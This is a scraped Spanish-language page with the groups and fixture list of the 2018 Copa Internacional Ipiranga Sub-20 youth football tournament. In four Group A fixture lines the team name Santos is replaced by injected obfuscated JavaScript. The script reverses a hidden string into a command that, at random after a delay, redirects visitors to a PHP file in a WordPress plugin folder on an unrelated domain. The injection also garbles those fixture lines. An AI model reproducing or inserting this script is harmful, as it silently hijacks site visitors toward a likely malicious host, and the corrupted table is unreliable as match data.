Conectate con nosotros

Juveniles

Grupos y Fixture de la Copa Ipiranga Sub-20

to_brasileiro-sub-20-2011.jpg» alt=»Copa Internacional Ipiranga Sub-20″ width=»30″ align=»absmiddle»> Copa Internacional Ipiranga Sub-20 2018

Grupo A

# Equipe Pontos J V E D Gp Gc S %
1 Grêmio 0 0 0 0 0 0 0 0
2 Santos 0 0 0 0 0 0 0 0
3 Botafogo 0 0 0 0 0 0 0 0
4 Peñarol (URU) 0 0 0 0 0 0 0 0
5 Racing (ARG) 0 0 0 0 0 0 0 0
30/11/2018   15:00 01 Grêmio Grêmio x Racing (ARG) Racing (ARG)
30/11/2018   17:15 01 Peñarol (URU) Peñarol (URU) x Botafogo Botafogo
2/12/2018   15:00 02 Racing (ARG) Racing (ARG) x $mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos.png» alt=»Santos» width=»16″ hspace=»2″ border=»0″> tos
2/12/2018   17:00 02 Botafogo Botafogo x Grêmio Grêmio
4/12/2018   15:00 03 tos $mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos.png» alt=»Santos» width=»16″ hspace=»2″ border=»0″> x Botafogo Botafogo
4/12/2018   17:30 03 Grêmio Grêmio x Peñarol (URU) Peñarol (URU)
6/12/2018   15:00 04 Peñarol (URU) Peñarol (URU) x $mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos.png» alt=»Santos» width=»16″ hspace=»2″ border=»0″> tos
6/12/2018   17:30 04 Botafogo Botafogo x Racing (ARG) Racing (ARG)
8/12/2018   13:00 05 Racing (ARG) Racing (ARG) x Peñarol (URU) Peñarol (URU)
8/12/2018   16:30 05 tos $mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos.png» alt=»Santos» width=»16″ hspace=»2″ border=»0″> x Grêmio Grêmio

Grupo B

# Equipe Pontos J V E D Gp Gc S %
1 Flamengo 0 0 0 0 0 0 0 0
2 Cruzeiro 0 0 0 0 0 0 0 0
3 São Paulo 0 0 0 0 0 0 0 0
4 Independiente (ARG) 0 0 0 0 0 0 0 0
5 Nacional (URU) 0 0 0 0 0 0 0 0
1/12/2018   18:30 01 São Paulo São Paulo x Nacional (URU) Nacional (URU)
1/12/2018   21:00 01 Flamengo Flamengo x Cruzeiro Cruzeiro
3/12/2018   15:30 02 Nacional (URU) Nacional (URU) x Independiente (ARG) Independiente (ARG)
3/12/2018   20:00 02 Cruzeiro Cruzeiro x São Paulo São Paulo
5/12/2018   16:00 03 Independiente (ARG) Independiente (ARG) x Cruzeiro Cruzeiro
5/12/2018   18:30 03 São Paulo São Paulo x Flamengo Flamengo
7/12/2018   18:30 04 Flamengo Flamengo x Independiente (ARG) Independiente (ARG)
7/12/2018   21:30 04 Cruzeiro Cruzeiro x Nacional (URU) Nacional (URU)
9/12/2018   18:30 05 Independiente (ARG) Independiente (ARG) x São Paulo São Paulo
9/12/2018   21:00 05 Nacional (URU) Nacional (URU) x Flamengo Flamengo

Grupo C

# Equipe Pontos J V E D Gp Gc S %
1 Palmeiras 0 0 0 0 0 0 0 0
2 Atlético-MG 0 0 0 0 0 0 0 0
3 Vasco da Gama 0 0 0 0 0 0 0 0
4 River Plate 0 0 0 0 0 0 0 0
5 Toluca 0 0 0 0 0 0 0 0
30/11/2018   19:15 01 Atlético-MG Atlético-MG x River Plate River Plate
30/11/2018   21:30 01 Palmeiras Palmeiras x Vasco da Gama Vasco da Gama
2/12/2018   15:30 02 River Plate River Plate x Toluca
2/12/2018   17:30 02 Vasco da Gama Vasco da Gama x Atlético-MG Atlético-MG
4/12/2018   17:00 03 Toluca x Vasco da Gama Vasco da Gama
4/12/2018   19:15 03 Atlético-MG Atlético-MG x Palmeiras Palmeiras
6/12/2018   17:00 04 Palmeiras Palmeiras x Toluca
6/12/2018   19:15 04 Vasco da Gama Vasco da Gama x River Plate River Plate
8/12/2018   19:00 05 Toluca x Atlético-MG Atlético-MG
8/12/2018   21:30 05 River Plate River Plate x Palmeiras Palmeiras

Grupo D

# Equipe Pontos J V E D Gp Gc S %
1 Fluminense 0 0 0 0 0 0 0 0
2 Internacional 0 0 0 0 0 0 0 0
3 Corinthians 0 0 0 0 0 0 0 0
4 Boca Juniors 0 0 0 0 0 0 0 0
5 Defensor Sporting 0 0 0 0 0 0 0 0
1/12/2018   13:30 01 Internacional Internacional x Boca Juniors Boca Juniors
1/12/2018   16:00 01 Fluminense Fluminense x Corinthians Corinthians
3/12/2018   14:00 02 Boca Juniors Boca Juniors x Fluminense Fluminense
3/12/2018   16:00 02 Corinthians Corinthians x Defensor Sporting Defensor Sporting
5/12/2018   15:30 03 Defensor Sporting Defensor Sporting x Boca Juniors Boca Juniors
5/12/2018   17:30 03 Fluminense Fluminense x Internacional Internacional
7/12/2018   14:00 04 Internacional Internacional x Defensor Sporting Defensor Sporting
7/12/2018   16:00 04 Boca Juniors Boca Juniors x Corinthians Corinthians
9/12/2018   13:20 05 Defensor Sporting Defensor Sporting x Fluminense Fluminense
9/12/2018   16:00 05 Corinthians Corinthians x Internacional Internacional
Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Juveniles